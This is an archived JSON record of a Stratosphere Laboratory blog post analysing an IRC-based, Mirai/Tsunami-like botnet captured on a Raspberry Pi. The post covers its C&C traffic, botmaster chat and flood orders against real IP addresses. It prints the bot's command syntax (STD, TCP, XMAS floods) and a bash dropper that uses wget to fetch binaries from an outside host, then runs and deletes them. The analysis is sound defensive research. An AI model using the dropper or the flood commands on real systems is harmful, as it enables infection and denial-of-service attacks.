{
	"id": "523e5eb6-d0a1-4476-a7cd-5a26dfce6296",
	"created_at": "2026-04-06T00:14:00.333517Z",
	"updated_at": "2026-04-10T03:20:17.069568Z",
	"deleted_at": null,
	"sha1_hash": "5bfd6211c2558831630691cd5b06931232db32d8",
	"title": "Analysis of an IRC based Botnet — Stratosphere Laboratory",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 370679,
	"plain_text": "Analysis of an IRC based Botnet — Stratosphere Laboratory\r\nPublished: 2019-04-18 · Archived: 2026-04-05 16:15:41 UTC\r\nThis blog post was authored by María José Erquiaga (@MaryJo_E), on 2019-04-26\r\nThis blog post aims to give an insight into an IRC-based botnet, describing its network behavior and showing the analysis of the C\u0026C. By analyzing the botnet's network traffic it was possible to identify the botmasters using an IRC channel and to observe not only the conversation between them but also the orders they give to the bot.\r\nBotnet behavior\r\nThe infected device was a Raspberry Pi (ARMv6) running Raspbian OS. The sample we executed was 49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0; the capture ID is 34-1. According to VirusTotal, the possible name for that malware sample is Mirai.\r\nAfter running the malware for the first time, the device contacts the IP 185.244.25.235 on port 80/TCP and downloads a file called “mips” using the GNU Wget agent. It repeats the same action to download other files. The names of the downloaded files are: mips, mipsel, sh4, x86, armv7l, armv6l, i686, powerpc, i586, m68k, sparc and armv4l.\r\nThen, the bot establishes a connection with the IP 185.244.25.235 on port 6667 and joins an IRC channel called Summit. The communication with the remote server is the following:\r\nIP 185.244.25.235.6667 \u003e 192.168.1.195.48986:\r\nirc.Summit.gov.GoV NOTICE AUTH :*** Looking up your hostname...\r\nirc.Summit.gov.GoV NOTICE AUTH :*** Found your hostname\r\nIP 192.168.1.195.48986 \u003e 185.244.25.235.6667:\r\nNICK [ARM4T|PCVREB]\r\nUSER VHIDFQC localhost localhost :VHIDFQC\r\nThe remote server sends a PING and our device replies with a PONG. Then the infected device receives its first order, given by the botmaster whose nickname is AmpAttacks:\r\nAmpAttacks :TCP Packeting 66.67.61.168!\r\nThe bot sends TCP SYN packets with the NS flag set to 66.67.61.168 port 63798. 
The NS flag, which stands for Nonce Sum, is still an experimental flag used to help protect against accidental or malicious concealment of marked packets from the sender [1]. The service registered for port 63798 is Apple Xsan (Xsan Filesystem Access). This means that either the target host was using that port for another service, or the botnet owners knew the target was an Apple device and aimed the attack at it.\r\nThe domain registered to that IP is rr.com. An nmap scan of that IP reveals that all ports are filtered; it also reveals that the host is up, with the hostname cpe-66-67-61-168.rochester.res.rr.com.\r\nhttps://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet\r\nPage 1 of 9\n\nThe bot then sends an IRC packet to report the successful end of the AmpAttacks TCP flood against 66.67.61.168:\r\n[Figure: IRC packet reporting TCP Flood Against 66.67.61.168]\r\nSince our bot is on the IRC channel, it is possible to observe the conversation between the members of that channel. According to the IRC RFC [2], the format used when sending messages on an IRC channel is:\r\nmsgto =/ nickname / ( nickname \"!\" user \"@\" host )\r\nConsidering that format, it is possible to identify the nicknames and users in the channel; some of them are Spoof, Tragedy, Erradic and AmpAttacks.\r\nIn the conversation, the botmasters are talking about IRC. 
Some of the conversation is transcribed here:\r\nIP 185.244.25.235 \u003e 192.168.1.195:\r\nirc.Summit.gov.GoV MODE ##Summit +q Spoof\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :crazy how i know rock shit about ircs lmdao\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :fao*\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :crazy how i know rock shit about ircs lmdao\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :fao*\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :It's literally just a chatting program\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :But the IRC bot forces the device to join the channel as anothe\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :And they listen\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :!* makes them listen\r\nTragedy!Erradic@Summit.gov.GoV MODE ##Summit +v [x86_64|BWQLXKB]\r\nTragedy!Erradic@Summit.gov.GoV MODE ##Summit +v [MIPS|WGEQAV]\r\nTragedy!Erradic@Summit.gov.GoV MODE ##Summit +v [ARM4T|PCVREB]\r\nAmpAttacks!AmpAttacks@Summit.gov.GoV PRIVMSG ##Summit :???\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :Giving them a voice so they can reply\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :This is the part I need to fix\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :!* STD 1.1.1.1 1 1\r\nOur bot replies:\r\n##Summit :STD Packeting 1.1.1.1!\r\nThe bot sends two kinds of packets to the IP 1.1.1.1. Those are:\r\n1. To the IP 1.1.1.1 on port 256/UDP: bad length 4096 \u003e 1472\r\nSUMMIT.. %s, STD Flood Against %s Finished!....Incorrect Usage, %s :XMAS \u003cTarget\u003e \u003cPort\u003e \u003cTime\u003e 32 1024 1\r\n....Incorrect Usage, %s :RawUDP \u003cTarget\u003e \u003cTime\u003e\r\n.... %s :RawUDP Packeting %s!\r\n.. %s, RawUDP Flood Against %s Finished!\r\n2. To the IP 1.1.1.1: ip-proto-17\r\n........./bin/sh.sh..-c..................................................(nil)...(null)..+.-. 
.0x.0X....\r\nFor the attack on port 256/UDP, 2159 packets were observed, and for the TCP attack 2202 packets were observed.\r\nThe attacked IP 1.1.1.1 is a DNS server [3]. Once the flood is finished, the bot reports to the master:\r\nTragedy, TCP Flood Against 1.1.1.1 Finished!\r\nThen the conversation between the botmasters continues:\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :I forgot to enable raw headers\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :They'll say \"@Tragedy : TCP Packeting 1.1.1.1\"\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :Then when the flood is over they'll say \"@Tragedy, your TCP flo\r\nAmpAttacks!AmpAttacks@Summit.gov.GoV PRIVMSG ##Summit :!* TCP 50.50.50.53 53 10 32 syn 0 10\r\nOur bot reports that it is starting the attack:\r\nAmpAttacks :TCP Packeting 50.50.50.53!\r\nThe bot sends SYN packets to the IP 50.50.50.53 on port 53. There is no registrant information for this IP (Registrant Name: REDACTED FOR PRIVACY); only the country (US) and the AS (5650, Frontier Communications of America, Inc.) were available. 
When the bot finishes the flood, it reports to the masters:\r\nAmpAttacks, TCP Flood Against 50.50.50.53 Finished!\r\n:irc.Summit.gov.GoV 421 [ARM4T|PCVREB] AmpAttacks, :Unknown command\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :eww yarn\r\nAmpAttacks!AmpAttacks@Summit.gov.GoV PRIVMSG ##Summit :lol imagine saying ew to servers\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :Googles and Amazons constantly leave and join back\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :eww servers\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :i call huawei\r\nAmpAttacks!AmpAttacks@Summit.gov.GoV PRIVMSG ##Summit :because I'm constantly loading\r\nAmpAttacks!AmpAttacks@Summit.gov.GoV PRIVMSG ##Summit :and dupes leave and rejoin\r\nAmpAttacks!AmpAttacks@Summit.gov.GoV PRIVMSG ##Summit :what I mean is\r\nAmpAttacks!AmpAttacks@Summit.gov.GoV PRIVMSG ##Summit :the same bot\r\nAmpAttacks!AmpAttacks@Summit.gov.GoV PRIVMSG ##Summit :trying to rejoin\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :You can right click on a bot and get all its info with Whois\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :* [x86_64|ZBGMF] (PDCVY@Zombie-190A588A.us-west-2.compute.amazonaws\r\nThen more than 10 bots join the IRC channel; these are machines from Google and Amazon that are leaving and rejoining the channel, and the botmasters talked about it:\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :\u003c~AmpAttacks\u003e and dupes leave and rejoin\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :\u003c~Tragedy\u003e This doesn't allow dupes Lol the Unreal config Max per I\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :\u003c~AmpAttacks\u003e what I mean is\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :\u003c~AmpAttacks\u003e the same bot\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :\u003c~AmpAttacks\u003e trying to rejoin\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit 
:\u003c~Tragedy\u003e You can right click on a bot and get all its info with W\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :-\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :[MIPS|DINPVL] is GOVHTWTH@Zombie-3E8CF5D5.rev.home.ne.jp * GOVHTWTH\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :[MIPS|DINPVL] is using modes +iwxG\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :[MIPS|DINPVL] is connecting from *@116-220-1-247.rev.home.ne.jp 116\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :[MIPS|DINPVL] on ##Summit\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :[MIPS|DINPVL] using irc.Summit.gov.GoV Summit.gov\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :[MIPS|DINPVL] has been idle 2hrs 54mins 32secs, signed on Fri Dec 2\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :[MIPS|DINPVL] End of /WHO\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :.ACTION .8Hits you with a swift Yeet.\r\nEntity!Entity@Summit.gov.GoV PRIVMSG ##Summit :we're also testing the curl for thinkphp rn\r\nAmpAttacks!AmpAttacks@Summit.gov.GoV PRIVMSG ##Summit :*die*\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :.ACTION .4Slaps everyone with a large trout in a single swing..\r\nRegarding our bot's name, [ARM4T|PCVREB], and the names of the bots that have joined the channel, we can assume that the bot names contain the device architecture, for instance [MIPS|DINPVL] or [x86_64|ZBGMF]. 
The botmasters talked about this here:\r\n[Figure: Conversation between the botmasters]\r\nThe conversation between the botmasters continues and the bot receives more orders; botmasters that were not in the previous chat write on the channel:\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :Theres no help cmd\r\nshadoh!shadoh@Summit.gov.GoV MODE ##Summit +v [x86_64|ITVX]\r\nshadoh!shadoh@Summit.gov.GoV PRIVMSG ##Summit :rip\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :I didn't set the raw headers mode yet\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :Was making sure floods worked\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :And they do (:\r\n....\r\nshadoh!shadoh@Summit.gov.GoV PRIVMSG ##Summit :!* XMAS 123.59.209.185 80 30 32 1024 10\r\nThe order from the botmaster specifies an XMAS attack against the IP address 123.59.209.185 on port 80. This is a DoS attack that sends packets to an IP with TCP header flags set so that they are harder for the target to process.\r\nThe bot sends packets to the IP 123.59.209.185 on port 80. The IP is registered in China, and the network name is CloudVsp. At the moment, the IP is not active. The packet headers sent by the bot look like this:\r\nIP 192.168.1.195.65279 \u003e 123.59.209.185.80: Flags [SP.U], seq 4278190079:4278191103, ack 0, win 65279, urg 0, l\r\nThe TCP flags set in this case are SP.U, meaning that SYN, PUSH and URG are set at the same time. 
While the bot is attacking, it also receives more orders from the same botmaster:\r\nshadoh!shadoh@Summit.gov.GoV PRIVMSG ##Summit :!* XMAS 123.59.209.185 80 30 32 1024 10\r\nThe botmaster sends the same message 9 times in total; meanwhile, the conversation between the attackers continues:\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :yooo\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :We reppin Guandong over here\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :[IPLookup] Getting Info For -\u003e 119.146.203.154...\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :There we go lmao\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :For the clout\r\nTragedy!Erradic@Summit.gov.GoV PRIVMSG ##Summit :\u003c3\r\nTragedy!Erradic@Summit.gov.GoV QUIT :Client has disconnected from Summit.gov\r\nThen, our bot receives another order:\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :!* STD 74.91.117.248 21 25\r\nThe bot replies to inform that it will perform the received order:\r\n##Summit :STD Packeting 74.91.117.248!\r\nThe domain of that IP is craftdiggers.g.nfoservers.com [4]. While doing the flood, the bot sends two kinds of packets:\r\n1. IP address 74.91.117.248, port 5376/UDP, bad length 4096 \u003e 1472\r\n2. IP address 74.91.117.248: ip-proto-17\r\nAfterwards, the bot receives more orders to perform a DoS attack on port 80:\r\nSpoof!Spoof@Summit.gov.GoV PRIVMSG ##Summit :!* TCP 71.61.66.148 80 22 32 syn 0 10\r\nOur bot informs that the attack will be performed:\r\nSpoof :TCP Packeting 71.61.66.148!\r\nThen, the bot informs that the attack is finished:\r\nSpoof, TCP Flood Against 71.61.66.148 Finished!\r\nIn this case, the domain name registered for the IP 71.61.66.148 is comcast.net.\r\nAfter that, the bot tries to join the channel again several times, but it fails; the sequence is the following:\r\n1. 
The bot sends SYN packets to the remote server 185.244.25.235 on port 6667\r\n2. The remote server replies with a TCP packet (P flag):\r\n   1. irc.Summit.gov.GoV NOTICE AUTH :*** Looking up your hostname…\r\n   2. irc.Summit.gov.GoV NOTICE AUTH :*** Found your hostname\r\n3. The bot replies:\r\n   1. NICK [ARM4T|PCVREB]\r\n   2. USER VHIDFQC localhost localhost :VHIDFQC\r\n4. The remote server replies:\r\n   :irc.Summit.gov.GoV 433 * [ARM4T|PCVREB] :Nickname is already in use.\r\nAfter trying several times, one of the connections succeeds:\r\n[ARM4T|PCVREB]!VHIDFQC@Zombie-6024A57C.felk.cvut.cz JOIN :##Summit\r\nHowever, there seems to be a connection error: there is a ping timeout of 32 seconds. Then the remote server sends a packet with the F (FIN) flag and the connection is over. This process is repeated several times.\r\nThe bot tries to contact the remote server on port 6667 several times. It uses different nicknames, first HVLLTLBT, then PCVREB. This could be because several scripts were downloaded and executed at the same time to guarantee the botnet operation.\r\nAnalysis of the extracted files\r\nThe files downloaded by the malware were extracted and analyzed on VirusTotal; most of them were uploaded by us for the first time. The possible name for those samples is “Tsunami”. However, the possible name for the executed sample was “Mirai”. The executed sample downloads scripts that were developed for different architectures. 
This technique ensures that the botnet will run on most IoT devices, because it downloads several binaries and runs them until one of them works.\r\nThe SHA256 hashes of the files downloaded by the malware were also collected.\r\nAnalysis of the Source Code of the Malware\r\nThe malware's code is a bash script that downloads several files, changes their mode to +x so they can be executed, then executes each one and deletes it. 
The file names differ and most of them carry the architecture name (mips, x86, armv7, etc.).\r\n#!/bin/bash\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/mips; chmod +x mips; ./mips; r\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/mipsel; chmod +x mipsel; ./mip\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/sh4; chmod +x sh4; ./sh4; rm -\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/x86; chmod +x x86; ./x86; rm -\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv7l; chmod +x armv7l; ./arm\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv6l; chmod +x armv6l; ./arm\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/i686; chmod +x i686; ./i686; r\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/powerpc; chmod +x powerpc; ./p\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/i586; chmod +x i586; ./i586; r\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/m68k; chmod +x m68k; ./m68k; r\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/sparc; chmod +x sparc; ./sparc\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv4l; chmod +x armv4l; ./arm\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv5l; chmod +x armv5l; ./arm\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/440fp; chmod +x 440fp; ./440fp\r\nConclusion\r\nThe sample we used to infect the RPi was a bash script whose possible name according to VirusTotal is Mirai. It downloads files, executes 
them and then erases them. In order to do that, it contacts the server on port 80 and downloads the files using the GNU Wget agent.\r\nOnce the files are executed, the bot contacts a remote server on port 6667 and joins an IRC channel. The nickname it uses to join the channel is [ARM4T|HVLLTLBT]. It contains the architecture of the device and some letters. Other bots join the channel with names of the same format.\r\nOnce our bot is in the channel, it receives orders to perform TCP flood attacks against different IPs.\r\nThis malware could be a variant of the Mirai botnet, because Mirai performs DDoS attacks. However, our bot does not seem to scan for other devices on ports 22 or 23; it just performs TCP floods against different IPs. Moreover, the samples downloaded by the malware were extracted and analyzed on VirusTotal, and the possible name for those samples is Tsunami.\r\nReferences\r\n[1] Robust Explicit Congestion Notification (ECN) Signaling with Nonces, RFC 3540. https://tools.ietf.org/html/rfc3540\r\n[2] Internet Relay Chat: Client Protocol, RFC 2812. https://tools.ietf.org/html/rfc2812#page-4\r\n[3] 1.1.1.1 public DNS resolver. https://1.1.1.1\r\n[4] WHOIS record for IP 74.91.117.248:\r\nDomain Name: NFOSERVERS.COM\r\nRegistry Domain ID: 109323766_DOMAIN_COM-VRSN\r\nRegistrar WHOIS Server: whois.godaddy.com\r\nRegistrar URL: http://www.godaddy.com\r\nUpdated Date: 2016-12-30T19:59:34Z\r\nCreation Date: 2004-01-04T20:57:15Z\r\nRegistrar Registration Expiration Date: 2026-01-04T20:57:15Z\r\nRegistrar: GoDaddy.com, LLC\r\nRegistrar IANA ID: 146\r\nNetRange: 74.91.117.0 - 74.91.117.255\r\nCIDR: 74.91.117.0/24\r\nNetName: NFOSERVERS-SEA-1\r\nNetHandle: NET-74-91-117-0-1\r\nParent: NFOSERVERS-1 (NET-74-91-112-0-1)\r\nNetType: Reassigned\r\nOriginAS: AS32751\r\nCustomer: Nuclearfallout Enterprises, Inc. (C02882606)\r\nAcknowledgements\r\nThis research was done as part of our ongoing collaboration with Avast Software in the Aposemat project. 
The Aposemat project is funded by Avast Software.\r\nThanks to Veronica Valeros for her help with the analysis and with writing corrections.\r\nSource: https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet"
	],
	"report_names": [
		"analysis-of-a-irc-based-botnet"
	],
	"threat_actors": [],
	"ts_created_at": 1775434440,
	"ts_updated_at": 1775791217,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5bfd6211c2558831630691cd5b06931232db32d8.pdf",
		"text": "https://archive.orkl.eu/5bfd6211c2558831630691cd5b06931232db32d8.txt",
		"img": "https://archive.orkl.eu/5bfd6211c2558831630691cd5b06931232db32d8.jpg"
	}
}